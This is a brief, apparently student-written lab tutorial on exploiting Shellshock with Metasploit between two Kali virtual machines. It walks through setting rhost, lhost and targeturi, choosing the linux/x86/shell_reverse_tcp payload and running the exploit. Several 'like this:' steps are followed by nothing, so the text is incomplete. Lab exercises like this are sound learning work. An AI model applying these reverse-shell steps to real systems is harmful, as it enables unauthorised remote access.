Shellshock is vulnerability to get information of the target data and metasploit is the tool.
First of all, it needs two virtual machine which are kali Linux as the attacker and kali Linux backtrack as the target. After that, the adapter should change to NAT network and it ready to ready to do the vulnerability.
Open the command prompt both of them and type ifconfig to know each ip to do the vulnerability.
After knowing about the ip address, open the command prompt at kali Linux as attacker and type msfconsole.
Next, type it in the console like this:
After that, type set for rhost, lhost, targeturi:
set rhost (fill the target IP addrees) ==>
set lhost (fill the attacker IP address) ==>
set targetURI ==>
If done it, type show payload to see all the payload available and choose linux/x86/shell_reverse_tcp like this:
Furthermore, type “check” to know if the vulnerability can exploit or no:
Finally, it can exploit the target:
for example, if it can exploit the target: